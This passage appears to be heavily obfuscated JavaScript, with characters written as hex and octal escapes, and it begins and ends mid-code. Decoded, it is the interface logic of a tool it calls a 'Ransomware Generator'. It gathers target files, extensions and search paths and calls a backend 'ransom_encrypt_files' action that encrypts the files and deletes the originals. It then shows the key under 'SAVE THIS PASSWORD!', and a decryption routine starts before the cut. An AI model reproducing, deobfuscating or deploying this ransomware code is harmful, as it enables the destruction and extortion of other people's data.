x2e\154\x65\156\147\164\x68\51\x29\x3b\12\11\x9\11\x7d\xa\11\11\11\x63\157\156\163\164\x20\x70\x61\163\163\167\157\x72\144\105\x6c\x20\x3d\40\x64\x6f\x63\x75\x6d\145\156\x74\56\x67\145\164\105\154\x65\x6d\x65\156\x74\x42\171\111\144\50\x27\x72\x61\156\163\x6f\155\x2d\x70\141\163\x73\x77\157\162\x64\47\51\73\12\x9\11\11\x69\x66\x20\x28\x70\x61\x73\x73\167\157\162\x64\105\154\51\40\x7b\12\11\x9\11\x9\160\x61\163\163\x77\x6f\162\144\x45\154\x2e\x76\141\154\x75\x65\40\x3d\40\x70\x61\163\x73\167\x6f\162\x64\73\xa\x9\x9\x9\11\x70\141\x73\x73\167\x6f\162\144\105\x6c\x2e\164\171\x70\145\40\75\x20\47\x74\145\x78\164\x27\x3b\xa\11\x9\11\11\163\x65\x74\124\151\155\x65\157\165\164\x28\x28\51\x20\x3d\76\40\x7b\x20\x69\146\x20\50\160\141\163\163\167\157\x72\x64\105\154\x29\x20\160\x61\163\x73\167\x6f\162\x64\105\154\56\164\171\160\x65\40\75\x20\47\160\141\163\x73\x77\x6f\162\x64\x27\73\x20\175\54\x20\x32\x30\60\60\51\x3b\xa\11\11\11\x7d\12\x9\x9\11\x74\x68\151\x73\x2e\164\157\141\163\x74\x28\47\120\x61\x73\163\167\x6f\x72\144\x20\147\145\x6e\145\x72\x61\164\x65\144\41\47\54\40\x27\163\165\x63\143\145\163\x73\x27\x29\x3b\xa\x9\11\x7d\x2c\12\x9\11\163\150\157\167\x49\x72\x72\145\x76\145\x72\x73\x69\x62\x6c\x65\115\157\x64\x61\x6c\50\x6d\x65\163\x73\141\x67\145\x29\x20\x7b\xa\x9\11\11\162\145\x74\x75\162\156\40\156\x65\x77\40\x50\x72\157\155\151\163\x65\x28\50\x72\145\163\x6f\x6c\x76\145\x29\x20\75\x3e\40\173\12\x9\x9\11\x9\x63\x6f\x6e\x73\x74\x20\x6d\157\x64\x61\x6c\40\75\x20\144\x6f\143\x75\155\145\156\x74\x2e\147\145\x74\105\x6c\x65\155\x65\x6e\x74\102\171\x49\144\x28\x27\x69\x72\162\x65\x76\x65\162\x73\151\x62\154\145\55\x6d\157\x64\141\154\47\x29\73\xa\x9\x9\11\11\x63\157\156\163\x74\x20\x6d\145\x73\x73\x61\x67\x65\x45\x6c\40\75\40\x64\x6f\143\165\x6d\145\156\x74\x2e\x67\145\164\105\154\x65\x6d\x65\156\x74\102\171\111\x64\50\x27\x69\x72\x72\x65\x76\x65\162\x73\151\x62\x6c\145\55\x6d\145\x73\x73\x61\x67\145\x27\51\73\12\11\x9\11\x9\143\157\x6e\163\164\40\143\157\156\146\x69\x72\x6d\102\x74\156\40\75\40\144\x6f\143\165\x6d\145\x6e\x74\56\x67\145\x74\x45\x6c\145\155\145\156\x74\102\171\111\144\x28\47\x69\x72\162\x65\166\x65\162\x73\x69\142\x6c\x65\x2d\143\x6f\x6e\146\151\162\155\55\142\164\x6e\47\51\x3b\xa\x9\11\11\x9\x63\x6f\156\163\164\40\x63\141\156\143\145\x6c\102\x74\156\x20\x3d\40\x64\x6f\143\165\155\145\156\164\56\x67\x65\x74\x45\154\145\x6d\145\156\x74\x42\x79\111\144\x28\x27\151\162\162\x65\166\145\x72\163\x69\x62\154\145\x2d\143\x61\156\143\x65\x6c\x2d\x62\164\156\x27\51\x3b\xa\x9\11\11\x9\143\157\156\x73\x74\x20\x63\x6c\157\163\145\102\164\x6e\40\75\40\x64\x6f\x63\165\155\145\156\x74\x2e\x67\x65\164\105\x6c\145\x6d\145\x6e\x74\x42\171\x49\144\x28\47\151\162\x72\x65\x76\145\x72\x73\151\142\x6c\x65\x2d\155\x6f\144\141\x6c\x2d\143\154\x6f\163\x65\x27\51\73\xa\11\x9\x9\11\xa\11\x9\11\11\151\146\40\50\41\155\157\x64\x61\154\x20\174\x7c\40\41\155\145\x73\x73\141\147\x65\x45\x6c\51\40\x72\145\x74\165\162\156\40\162\145\163\x6f\x6c\x76\145\x28\146\141\x6c\163\x65\51\x3b\12\11\x9\x9\x9\12\11\x9\x9\x9\x6d\x65\x73\163\x61\x67\145\x45\154\x2e\x74\145\x78\x74\103\157\156\x74\x65\156\164\x20\x3d\x20\x6d\x65\x73\x73\141\147\x65\x3b\12\x9\x9\11\x9\155\157\144\x61\x6c\56\163\x74\171\154\145\56\x64\x69\163\x70\x6c\141\x79\x20\x3d\x20\47\x66\x6c\145\x78\47\x3b\xa\11\11\x9\x9\12\x9\x9\11\x9\x63\157\156\163\x74\40\x63\x6c\x65\x61\x6e\165\x70\x20\x3d\40\x28\51\x20\x3d\76\40\173\12\11\x9\11\11\x9\155\157\x64\x61\x6c\x2e\x73\x74\x79\x6c\145\x2e\x64\x69\x73\160\x6c\141\x79\40\x3d\40\47\x6e\157\156\x65\x27\x3b\12\x9\11\11\11\x9\x63\157\156\146\151\162\155\102\164\x6e\x2e\157\x6e\x63\154\x69\x63\153\x20\x3d\40\156\x75\154\x6c\x3b\12\11\x9\11\x9\x9\x63\141\x6e\143\145\x6c\102\164\156\x2e\157\x6e\x63\x6c\151\x63\x6b\40\x3d\x20\156\x75\x6c\154\73\12\11\x9\x9\11\11\x63\154\157\x73\145\x42\x74\156\56\157\156\x63\x6c\x69\x63\x6b\x20\x3d\40\x6e\165\x6c\154\73\12\x9\11\x9\11\175\x3b\xa\x9\11\11\11\xa\11\11\x9\11\x63\157\156\x66\151\162\155\102\164\x6e\x2e\157\x6e\143\x6c\x69\x63\x6b\40\x3d\40\x28\51\x20\x3d\76\x20\x7b\xa\11\x9\x9\11\11\143\154\x65\141\x6e\x75\160\50\51\x3b\12\x9\11\x9\x9\x9\x72\145\163\157\x6c\x76\x65\x28\x74\x72\165\x65\51\x3b\12\x9\11\x9\11\175\x3b\xa\x9\x9\11\x9\xa\x9\11\11\11\143\141\156\x63\x65\154\x42\x74\156\56\157\x6e\x63\154\151\x63\153\40\x3d\40\x28\51\40\75\x3e\x20\173\xa\11\x9\11\11\11\143\x6c\145\141\156\165\160\50\51\x3b\xa\11\11\x9\11\11\162\145\x73\x6f\x6c\x76\x65\50\x66\141\154\163\145\x29\73\12\x9\11\11\x9\175\73\12\11\11\11\11\12\x9\11\x9\11\x63\x6c\x6f\x73\145\x42\x74\x6e\56\157\x6e\143\x6c\151\143\x6b\x20\x3d\x20\x28\x29\40\x3d\x3e\x20\x7b\xa\11\11\x9\x9\11\143\154\145\141\x6e\165\160\50\x29\73\xa\x9\x9\11\x9\x9\162\145\x73\157\154\166\x65\50\x66\x61\x6c\x73\145\x29\73\xa\11\11\11\11\x7d\73\xa\11\x9\11\11\12\x9\11\11\11\x2f\x2f\40\x43\154\157\163\x65\x20\157\156\x20\142\x61\143\x6b\144\x72\x6f\160\40\143\x6c\x69\x63\x6b\xa\x9\x9\11\11\x6d\157\x64\141\x6c\x2e\x6f\x6e\x63\154\x69\143\153\40\75\40\50\145\x29\x20\75\76\40\173\12\x9\11\11\x9\11\151\x66\x20\x28\145\x2e\164\x61\x72\147\x65\x74\40\75\75\75\40\x6d\x6f\144\141\x6c\51\40\x7b\xa\x9\x9\x9\11\x9\11\143\x6c\145\x61\156\x75\160\x28\51\73\12\x9\x9\x9\x9\x9\11\162\x65\163\157\x6c\166\145\x28\x66\x61\154\163\x65\x29\x3b\xa\x9\11\11\11\11\x7d\xa\x9\x9\11\x9\x7d\73\12\11\x9\x9\x7d\x29\x3b\12\x9\11\175\x2c\xa\11\11\xa\11\11\141\x73\x79\156\x63\x20\x72\141\156\163\157\x6d\105\x6e\143\162\171\160\x74\106\151\154\x65\163\50\51\40\x7b\12\x9\11\11\x63\x6f\156\x73\x74\40\x66\151\154\145\163\40\x3d\40\x41\x72\x72\x61\171\56\146\162\157\155\50\x74\150\151\163\x2e\x72\141\156\163\157\x6d\123\x65\x6c\x65\x63\164\145\x64\x46\151\154\145\163\51\x3b\xa\x9\x9\11\143\157\x6e\163\164\x20\x65\170\x74\x65\x6e\163\151\x6f\156\163\40\x3d\x20\x64\157\x63\x75\155\145\156\164\x2e\147\145\x74\x45\154\145\x6d\x65\x6e\x74\x42\x79\x49\x64\x28\47\162\x61\x6e\x73\x6f\x6d\55\145\170\164\145\156\x73\151\157\x6e\163\47\x29\56\166\x61\154\165\145\56\163\160\x6c\151\x74\x28\47\54\47\x29\x2e\x6d\141\160\50\145\x20\75\76\x20\x65\56\x74\x72\151\x6d\x28\x29\x2e\164\157\x4c\x6f\167\145\162\x43\x61\x73\145\50\x29\x29\56\x66\x69\154\164\145\162\50\145\x20\x3d\76\40\145\51\73\12\x9\x9\11\143\x6f\156\x73\x74\x20\x73\145\141\162\143\150\x50\141\x74\150\x73\40\75\x20\x64\157\x63\165\155\145\x6e\x74\56\x67\145\x74\x45\154\145\155\x65\x6e\164\102\x79\x49\x64\50\47\162\141\156\x73\157\155\55\163\145\141\162\x63\x68\55\160\141\164\150\163\x27\51\56\x76\x61\x6c\x75\145\56\163\160\154\x69\x74\x28\x27\54\47\51\56\155\141\x70\50\160\40\75\76\x20\160\56\164\x72\x69\x6d\x28\51\51\56\x66\151\x6c\164\145\x72\50\x70\40\x3d\x3e\40\160\x29\x3b\12\11\11\x9\x63\157\x6e\x73\x74\40\x70\141\x73\163\167\x6f\162\x64\x20\x3d\40\144\x6f\143\x75\x6d\145\x6e\164\56\x67\x65\x74\105\x6c\x65\x6d\145\x6e\164\x42\x79\111\144\x28\x27\x72\141\x6e\x73\x6f\x6d\x2d\160\141\163\163\167\157\x72\x64\x27\51\56\x76\141\154\165\x65\73\xa\11\x9\x9\xa\x9\11\x9\151\146\x20\x28\x66\x69\154\x65\x73\56\154\x65\156\147\x74\150\40\75\x3d\x3d\x20\60\40\46\x26\x20\x65\170\164\145\156\x73\151\x6f\x6e\163\56\x6c\145\156\147\164\x68\x20\x3d\x3d\75\40\x30\51\40\173\12\11\x9\x9\11\x72\145\164\x75\x72\156\x20\x74\x68\x69\x73\x2e\164\157\141\x73\x74\50\47\120\154\x65\x61\163\x65\x20\x73\145\x6c\145\x63\164\40\x66\151\154\145\x73\x20\x6f\162\x20\163\x70\145\x63\151\x66\171\x20\145\170\x74\145\x6e\x73\151\x6f\x6e\x73\56\47\x2c\x20\x27\x65\162\162\157\162\x27\x29\x3b\12\11\11\11\175\12\x9\x9\x9\12\11\x9\x9\x63\157\156\163\x74\x20\146\151\x6c\145\103\157\165\x6e\164\40\x3d\40\x66\x69\x6c\x65\x73\x2e\154\145\x6e\x67\164\150\40\76\x20\60\40\77\x20\x66\x69\154\145\163\56\154\x65\x6e\147\164\x68\40\53\x20\x27\40\163\145\x6c\x65\143\x74\145\x64\40\x66\x69\x6c\145\x28\x73\x29\47\x20\x3a\x20\x27\146\151\x6c\x65\163\x20\167\x69\x74\150\x20\x73\x70\x65\x63\151\146\151\x65\144\40\145\170\x74\145\156\x73\x69\x6f\x6e\163\x27\73\12\x9\x9\11\x63\x6f\x6e\163\164\x20\x6d\145\163\x73\141\147\145\x20\x3d\40\x60\124\150\x69\163\40\x77\x69\x6c\x6c\x20\x65\156\143\162\171\x70\164\40\x24\173\146\151\154\x65\103\x6f\x75\156\164\175\x20\x61\x6e\x64\x20\104\105\114\105\124\x45\40\164\x68\145\x20\x6f\162\151\147\x69\156\141\x6c\40\x66\151\x6c\x65\x73\x21\134\x6e\x5c\156\x54\x68\151\163\40\x61\x63\164\151\157\x6e\40\x69\x73\x20\x49\x52\122\x45\126\x45\122\x53\111\102\x4c\x45\40\167\151\x74\150\157\165\x74\40\164\x68\145\40\x70\141\x73\x73\167\157\162\x64\41\x5c\x6e\x5c\x6e\x41\x72\145\x20\171\x6f\165\40\141\142\x73\157\x6c\x75\x74\x65\x6c\171\40\163\x75\162\145\x20\171\157\165\x20\x77\x61\156\164\x20\164\157\40\160\x72\x6f\x63\145\x65\144\x3f\140\x3b\xa\11\x9\x9\12\11\x9\x9\143\157\x6e\163\x74\x20\143\x6f\x6e\146\151\x72\x6d\x65\144\40\x3d\x20\x61\x77\141\151\x74\x20\x74\150\x69\163\x2e\x73\150\157\167\111\x72\x72\145\x76\145\x72\x73\151\x62\154\x65\115\x6f\144\141\x6c\50\x6d\x65\163\x73\141\147\x65\51\73\xa\11\x9\11\151\146\x20\50\x21\x63\157\x6e\146\x69\x72\155\145\x64\51\40\173\xa\x9\11\x9\x9\162\145\x74\165\x72\x6e\73\12\11\x9\x9\175\xa\11\11\11\12\x9\x9\x9\143\157\156\163\164\40\162\x65\163\165\x6c\x74\x73\x45\154\40\75\x20\x64\157\143\165\x6d\145\x6e\164\56\x67\145\x74\105\x6c\145\155\x65\156\164\102\x79\x49\144\50\47\x72\141\156\163\157\x6d\x2d\145\156\x63\162\x79\160\x74\x2d\x72\145\x73\165\154\x74\x73\x27\x29\73\xa\x9\x9\11\x69\146\40\x28\x72\145\x73\x75\x6c\x74\x73\105\154\51\x20\x72\x65\x73\165\x6c\164\163\x45\x6c\56\151\156\156\x65\x72\110\124\x4d\114\40\75\x20\x27\x3c\160\40\x73\x74\x79\x6c\x65\75\x22\143\157\154\157\162\72\166\x61\162\50\x2d\55\141\x63\x63\x65\x6e\164\x2d\147\x6f\x6c\144\51\x3b\42\x3e\x45\156\143\x72\x79\x70\x74\x69\156\x67\40\146\x69\x6c\145\163\x2e\56\x2e\x20\x54\x68\x69\x73\x20\155\x61\x79\x20\x74\x61\153\x65\x20\x61\x20\x77\x68\151\x6c\x65\56\74\x2f\160\76\47\73\xa\x9\11\x9\xa\11\11\11\x63\x6f\156\163\x74\40\162\145\163\x20\x3d\x20\141\x77\x61\x69\164\x20\164\x68\151\x73\56\x61\x70\x69\x28\x27\162\x61\x6e\x73\x6f\x6d\137\145\x6e\143\162\171\160\x74\137\x66\x69\154\145\x73\47\x2c\x20\173\xa\11\11\11\x9\146\151\x6c\145\x73\x3a\x20\112\x53\x4f\x4e\56\x73\x74\162\151\x6e\147\x69\146\x79\50\146\151\154\145\x73\x29\x2c\xa\11\11\11\x9\145\170\164\x65\156\x73\151\157\156\x73\72\x20\112\x53\117\x4e\56\163\164\x72\151\x6e\x67\151\x66\171\50\x65\x78\164\145\156\163\x69\x6f\156\163\x29\x2c\12\11\x9\11\11\x73\x65\x61\162\143\x68\x5f\x70\141\164\x68\163\72\x20\163\x65\x61\x72\143\150\x50\x61\x74\150\x73\x2e\x6c\145\156\x67\164\x68\x20\x3e\40\x30\x20\77\x20\163\x65\141\162\143\150\x50\x61\164\x68\163\56\152\x6f\151\x6e\50\x27\x2c\x27\51\40\x3a\x20\x75\156\x64\145\x66\151\156\x65\x64\54\xa\11\x9\x9\11\160\x61\x73\x73\167\157\x72\x64\72\x20\160\141\163\x73\167\x6f\162\x64\x20\174\x7c\40\x75\156\x64\x65\x66\x69\x6e\145\x64\xa\11\x9\11\175\x29\x3b\xa\11\x9\11\xa\11\11\x9\151\x66\x20\x28\162\x65\163\40\x26\x26\40\162\145\163\x2e\163\x74\x61\164\x75\163\x20\x3d\75\75\x20\47\163\165\143\x63\145\x73\x73\47\51\40\173\xa\x9\11\11\x9\x6c\x65\x74\40\150\164\155\x6c\x20\75\x20\140\x3c\144\x69\x76\40\163\x74\x79\x6c\x65\75\x22\x70\x61\144\144\x69\x6e\147\x3a\61\65\x70\x78\x3b\40\x62\x61\x63\153\147\x72\x6f\165\x6e\x64\x3a\166\141\x72\x28\x2d\55\142\x67\x2d\x6c\x69\x67\x68\164\51\73\40\x62\157\162\x64\x65\162\x2d\162\141\144\x69\x75\163\x3a\66\160\x78\x3b\40\155\141\x72\x67\x69\156\55\142\x6f\x74\x74\x6f\155\x3a\61\x72\x65\x6d\73\x22\76\xa\11\x9\11\11\11\x3c\150\64\x20\163\x74\171\154\145\x3d\42\x6d\141\x72\147\x69\156\x2d\x74\x6f\160\72\x30\73\x20\143\x6f\154\157\162\x3a\x76\141\162\x28\x2d\55\141\143\x63\x65\156\164\55\x67\x72\x65\x65\156\x29\73\x22\76\342\234\205\x20\x45\x6e\x63\162\x79\x70\164\x69\x6f\x6e\40\x43\157\155\160\154\145\164\x65\74\57\150\64\76\xa\x9\11\11\x9\x9\74\x70\76\74\x73\164\x72\157\156\x67\76\x45\x6e\x63\x72\x79\160\x74\x65\x64\72\x3c\x2f\163\164\x72\157\156\x67\x3e\40\x24\173\162\x65\163\56\145\x6e\x63\162\171\160\164\145\x64\x5f\143\157\x75\x6e\x74\x7d\x20\146\151\x6c\145\50\x73\x29\x3c\x2f\x70\76\12\x9\x9\11\x9\11\x3c\x70\x3e\x3c\163\x74\x72\157\156\x67\76\x46\141\151\x6c\145\144\x3a\x3c\57\163\x74\x72\157\156\x67\76\40\x24\x7b\x72\145\163\x2e\x66\141\151\154\x65\x64\x5f\x63\x6f\165\156\164\175\x20\x66\151\x6c\x65\50\x73\51\74\57\160\x3e\12\x9\11\11\x9\11\74\x70\x3e\x3c\163\x74\x72\157\156\147\x3e\x54\x6f\x74\141\154\x3a\74\57\163\164\162\157\x6e\147\76\40\x24\x7b\x72\x65\163\x2e\x74\157\x74\141\x6c\x5f\146\151\154\x65\x73\x7d\x20\146\x69\x6c\145\50\163\x29\74\57\160\x3e\12\x9\11\x9\x9\11\x3c\160\x20\x73\164\x79\x6c\145\75\x22\143\x6f\x6c\157\162\72\x76\141\162\50\55\55\141\143\143\x65\156\x74\x2d\x72\145\x64\51\73\x20\146\157\156\x74\55\x77\145\151\x67\x68\x74\72\x62\x6f\x6c\144\x3b\x20\155\x61\x72\147\151\x6e\55\x74\157\x70\72\61\x30\x70\x78\73\42\x3e\xf0\x9f\224\221\40\x50\101\x53\x53\127\117\x52\x44\72\x20\x3c\x63\x6f\144\x65\x20\163\164\171\x6c\145\x3d\42\142\141\x63\x6b\x67\x72\157\x75\x6e\144\x3a\166\x61\x72\x28\x2d\x2d\x62\147\55\144\x61\x72\153\x29\x3b\40\160\x61\144\144\151\156\x67\x3a\x34\160\170\40\x38\x70\170\73\x20\142\x6f\x72\x64\x65\x72\55\162\141\144\151\165\163\72\x34\x70\x78\73\x22\76\x24\x7b\x72\145\163\56\160\141\x73\x73\167\157\x72\x64\x7d\x3c\57\x63\x6f\x64\x65\x3e\74\x2f\160\x3e\12\x9\11\x9\x9\x9\74\160\40\163\164\x79\x6c\x65\x3d\x22\143\x6f\154\157\x72\72\166\141\162\50\55\x2d\x61\x63\x63\x65\156\x74\x2d\x72\x65\x64\51\x3b\x20\146\x6f\156\164\x2d\163\x69\x7a\145\x3a\x30\56\x39\x72\x65\155\73\x22\x3e\xe2\x9a\xa0\xef\270\x8f\x20\x53\x41\126\x45\x20\124\110\x49\123\x20\120\x41\123\x53\x57\117\x52\104\41\40\x57\x69\164\x68\x6f\165\164\x20\x69\x74\x2c\x20\x66\x69\154\x65\x73\40\x63\141\x6e\156\157\x74\40\142\145\40\x64\145\x63\x72\x79\x70\164\145\x64\x21\x3c\x2f\160\76\xa\11\11\x9\x9\x3c\57\144\x69\x76\x3e\x60\73\12\11\x9\11\x9\xa\x9\x9\x9\x9\x69\146\40\50\x72\x65\x73\56\x72\x65\163\x75\x6c\164\x73\40\46\46\x20\x72\145\163\x2e\162\x65\x73\165\154\164\163\56\154\145\x6e\x67\164\x68\x20\76\40\x30\x29\40\x7b\12\11\x9\x9\11\11\x68\x74\155\x6c\40\53\75\40\47\x3c\144\145\164\x61\151\154\163\x3e\x3c\x73\165\x6d\155\141\162\171\x20\x73\x74\x79\x6c\x65\x3d\42\143\165\162\163\157\162\72\160\157\x69\156\x74\x65\162\x3b\x20\143\157\154\x6f\162\x3a\166\141\x72\50\x2d\55\141\143\143\145\x6e\164\55\x62\154\x75\145\x29\73\x20\x6d\x61\x72\147\151\x6e\x2d\142\x6f\164\164\157\x6d\x3a\61\x30\x70\x78\x3b\x22\x3e\126\x69\145\167\40\x44\145\x74\141\151\154\x73\74\57\x73\x75\x6d\155\141\162\x79\x3e\74\144\x69\166\40\x73\x74\x79\x6c\x65\x3d\42\x6d\141\x78\x2d\x68\145\x69\x67\150\x74\x3a\63\x30\x30\160\x78\x3b\40\x6f\x76\145\162\146\x6c\x6f\167\x2d\171\72\x61\165\x74\157\x3b\x22\76\47\73\xa\11\11\11\11\11\x72\145\163\56\x72\145\x73\x75\x6c\164\163\56\x66\157\162\105\x61\143\150\x28\x72\40\75\76\40\173\xa\x9\11\x9\x9\x9\11\x63\157\156\x73\x74\40\x63\157\x6c\x6f\x72\40\75\40\162\x2e\163\x74\141\x74\x75\x73\40\75\75\75\40\x27\x65\x6e\143\162\171\160\x74\x65\x64\x27\x20\77\40\x27\166\141\162\50\x2d\55\x61\x63\x63\145\156\x74\x2d\147\x72\145\145\156\51\x27\40\72\40\162\56\163\164\x61\164\x75\x73\x20\75\75\x3d\x20\x27\146\x61\151\154\145\144\x27\40\77\x20\x27\x76\141\162\50\x2d\x2d\x61\143\x63\x65\156\164\55\162\145\x64\x29\47\x20\x3a\40\47\x76\x61\x72\x28\x2d\55\x61\x63\143\145\156\x74\55\147\157\x6c\x64\51\47\73\xa\11\11\x9\x9\11\x9\x68\x74\155\x6c\x20\x2b\x3d\x20\140\74\x64\x69\166\40\x73\x74\x79\154\x65\75\x22\160\x61\144\144\151\x6e\147\x3a\70\x70\x78\x3b\40\155\141\x72\147\x69\x6e\x2d\x62\x6f\x74\164\157\x6d\x3a\x35\160\x78\73\40\x62\x61\143\153\147\x72\x6f\x75\156\x64\x3a\x76\x61\162\50\x2d\x2d\x62\147\x2d\x6d\x65\x64\x29\x3b\40\x62\157\x72\144\145\x72\x2d\x72\x61\x64\151\x75\163\72\x34\x70\170\x3b\x20\142\157\162\x64\145\x72\55\154\x65\x66\164\72\x33\160\170\40\x73\x6f\x6c\x69\144\40\x24\x7b\143\157\154\x6f\x72\175\73\42\76\xa\x9\x9\11\11\x9\x9\x9\x3c\x73\164\x72\157\x6e\x67\x3e\44\x7b\x72\56\163\164\x61\164\x75\x73\56\x74\157\125\x70\160\145\x72\103\x61\163\x65\50\51\175\x3a\74\57\x73\x74\x72\157\156\x67\x3e\x20\44\x7b\x72\x2e\146\x69\154\145\56\163\160\154\151\x74\50\x27\57\47\51\x2e\x70\157\x70\50\51\175\74\142\162\76\12\x9\11\11\11\x9\x9\x9\x24\x7b\162\56\x72\145\141\163\157\156\40\77\x20\x60\74\x73\x6d\141\x6c\x6c\40\x73\x74\x79\154\x65\x3d\x22\143\157\154\x6f\162\x3a\166\141\162\x28\x2d\x2d\164\x65\x78\x74\x2d\155\x65\144\x29\x3b\x22\x3e\44\173\x72\x2e\x72\x65\141\x73\157\x6e\175\x3c\x2f\x73\x6d\141\x6c\x6c\76\x60\40\72\x20\x27\47\x7d\12\11\11\x9\11\x9\x9\74\x2f\x64\151\x76\76\x60\x3b\12\11\x9\x9\x9\11\x7d\x29\73\12\11\x9\x9\11\x9\150\x74\x6d\154\40\x2b\x3d\40\47\74\x2f\x64\151\166\76\74\57\x64\x65\x74\x61\x69\x6c\x73\x3e\47\73\xa\x9\x9\11\11\x7d\12\11\x9\x9\11\xa\x9\x9\11\x9\x69\146\40\50\x72\x65\163\x75\x6c\x74\163\105\154\51\x20\162\x65\x73\x75\x6c\x74\x73\105\154\56\x69\156\156\x65\162\110\x54\115\x4c\40\75\40\150\x74\155\x6c\x3b\xa\11\x9\11\x9\164\150\x69\163\x2e\141\x64\x64\x4e\x6f\x74\151\x66\151\x63\x61\x74\151\157\156\x28\47\122\141\x6e\x73\x6f\155\167\141\x72\145\x20\x47\145\156\x65\162\141\x74\157\x72\47\54\x20\140\x45\x6e\x63\162\171\160\164\145\x64\40\x24\173\x72\x65\163\x2e\145\156\x63\x72\171\x70\x74\x65\x64\x5f\x63\x6f\165\x6e\164\x7d\40\x66\x69\154\145\50\163\x29\x60\x2c\40\162\145\x73\x2e\145\x6e\x63\162\x79\x70\x74\x65\x64\137\x63\157\x75\x6e\x74\40\x3e\40\x30\40\x3f\40\47\x73\x75\x63\x63\x65\163\163\x27\x20\x3a\40\x27\x77\x61\162\x6e\151\x6e\x67\x27\51\x3b\xa\x9\11\11\11\164\150\x69\163\56\162\x61\156\163\x6f\155\123\145\x6c\145\143\164\x65\x64\x46\151\x6c\x65\163\56\143\154\145\x61\x72\50\x29\73\12\x9\x9\11\11\x74\150\x69\x73\56\x72\141\x6e\163\157\155\x55\160\x64\x61\164\x65\x43\x6f\x75\156\x74\50\x29\x3b\12\x9\x9\11\x7d\x20\x65\x6c\x73\x65\40\x7b\12\x9\x9\x9\11\x69\146\40\x28\x72\145\x73\x75\154\164\x73\x45\x6c\51\40\162\x65\163\165\154\164\x73\105\154\56\x69\x6e\156\145\162\x48\x54\x4d\114\40\x3d\x20\x60\x3c\160\40\163\x74\171\154\x65\75\42\x63\x6f\154\157\x72\x3a\x76\141\162\50\x2d\x2d\141\x63\x63\x65\x6e\x74\x2d\x72\x65\144\x29\73\x22\76\44\x7b\x72\145\163\77\x2e\155\145\x73\x73\141\x67\145\x20\174\174\x20\47\x45\x6e\143\162\171\x70\164\151\157\156\x20\146\x61\151\154\x65\x64\x2e\47\175\74\x2f\x70\76\x60\73\12\11\x9\11\x9\x74\150\151\163\56\x74\157\x61\163\x74\50\x72\145\163\77\56\x6d\145\x73\x73\x61\147\x65\x20\x7c\x7c\40\x27\x45\156\143\162\171\x70\x74\151\x6f\x6e\x20\146\141\151\x6c\145\144\x2e\x27\x2c\x20\47\145\x72\162\x6f\162\47\51\x3b\12\11\x9\x9\175\xa\x9\11\x7d\54\xa\11\11\141\x73\x79\x6e\x63\40\162\x61\x6e\163\x6f\x6d\104\x65\x63\x72\x79\x70\x74\x46\151\154\x65\50\x29\x20\173\12\11\11\x9\143\157\156\163\164\40\x65\156\x63\x72\171\160\x74\145\x64\106\x69\154\x65\40\75\40\144\x6f\x63\x75\x6d\x65\x6e\x74\56\x67\145\164\105\x6c\x65\x6d\145\x6e\164\102\x79\111\x64\x28\47\x72\x61\156\163\157\155\55\x64\145\143\162\171\x70\x74\x2d\x66\151\x6c\145\x27\51\x2e\x76\x61\154\x75\x65\73\12\11\11\11\x63\x6f\156\163\164\40\160\x61\163\x73\167\x6f\162\x64\40\75\40\x64\157\x63\x75\155\145\x6e\164\56\x67\x65\164\105\x6c\x65\x6d\145\156\x74\x42\x79\111\x64\x28\47\162\x61\156\x73\157\155\55\x64\145\143\x72\x79\160\164\x2d\160\x61\x73\x73\x77\157\162\144\x27\x29\56\166\141\x6c\x75\145\x3b\12\x9\x9\x9\12\11\11\x9\151\146\x20\x28\x21\145\156\x63\162\x79\x70\x74\145\144\x46\x69\154\x65\x20\x7c\x7c\x20\41\x70\141\163\x73\167\157\162\144\x29\40\173\xa\11\x9\x9\x9\162\145\164\x75\162\x6e\x20\x74\x68\x69\163\56\164\x6f\x61\163\x74\50\47\105\156\143\162\171\160\164\145\x64\x20\x66\151\x6c\145\x20\x70\141\164\150\40\x61\156\144\40\x70\141\x73\163\x77\157\x72\x64\x20\141\x72\x65\x20\162\145\161\165\151\162\x65\x64\x2e\x27\54\40\x27\145\x72\162\157\162\x27\51\x3b\12\11\11\11\x7d\xa\x9\x9\x9\12\11\x9\x9\x63\157\156\x73\x74\40\143\157\156\x66\x69\x72\155\145\x64\40\x3d\x20\141\167\x61\151\x74\x20\164\150\x69\163\x2e\x73\x68\x6f\167\x43\157\156\146\x69\x72\155\x4d\x6f\x64\x61\154\50\x60\x44\x65\x63\x72\171\160\164\x20\74\163\x74\162\x6f\x6e\x67\x3e\x24\173\145\156\x63\162\171\x70\x74\145\x64\x46\x69\x6c\145\x2e\x73\x70\x6c\x69\164\x28\47\57\47\x29\56\160\157\x70\50\51\175\74\x2f\x73\164\162\x6f\156\x67\76\x3f\140\54\40\x7b\40\x74\x79\160\x65\72\x20\47\x71\165\145\163\164\x69\x6f\156\x27\40\175\51\73\x20\x69\x66\40\x28\41\x63\x6f\156\x66\x69\162\155\145\x64\51\x20\x7b\xa\x9\x9\11\x9\x72\145\164\165\x72\x6e\x3b\12\x9\11\11\175\12\x9\x9\x9\12\x9\11\11\x63\157\156\x73\x74\40\162\145\163\165\154\164\x73\x45\154\x20\x3d\40\x64\157\x63\165\155\x65\156\164\x2e\x67\x65\x74\105\154\x65\x6d\x65\x6e\x74\102\x79\111\x64\50\47\162\141\x6e\163\x6f\155\55\x64\x65\143\162\x79\x70\x74\x2d\162\145\x73\165\154\164\163\x27\51\73\12\x9\x9\11\151\146\x20\50\162\145\163\165\x6c\164\x73\x45\154\x29\x20\x72\145\x73\x75\154\x74\x73\x45\154\56\151\x6e\156\145\x72\110\x54\115\x4c\40\75\40\x27\74\x70\40\163\x74\x79\x6c\x65\x3d\x22\x63\157\x6c\157\x72\x3a\x76\x61\x72\x28\55\x2d\x61\143\x63\x65\x6e\x74\x2d\x67\157\154\144\x29\73\42\x3e\x44\145\143\x72\171\x70\x74\x69\156\x67\40\x66\x69\x6c\x65\x2e\x2e\56\x3c\57\160\76\x27\73\12\11\11\x9\12\11\x9\x9\x63\x6f\156\163\x74\40\x72\145\163\40\x3d\40\141\x77\x61\x69\164\40\164\x68\151\163\56\x61\160\151\x28\x27\162\141\x6e\163\x6f\x6d\137\144\145\x63\x72\171\160\x74\x5f\x66\151\154\145\47\x2c\40\x7b\12\x9\x9\11\x9\x65\x6e\x63\x72\x79\160\164\145\144\x5f\146\151\x6c\145\x3a\40\x65\156\x63\x72\x79\160\x74\145\x64\106\151\154\x65\54\12\11\x9\x9\11\x70\x61\x73\x73\167\x6f\162\x64\x3a\x20\x70\141\x73\x73\x77\x6f\162\144\12\11\x9\11\175\51\x3b\xa\11\x9\x9\xa\11\11\x9\x69\x66\40\x28\x72\145\163\40\46\46\40\x72\145\x73\x2e\163\164\x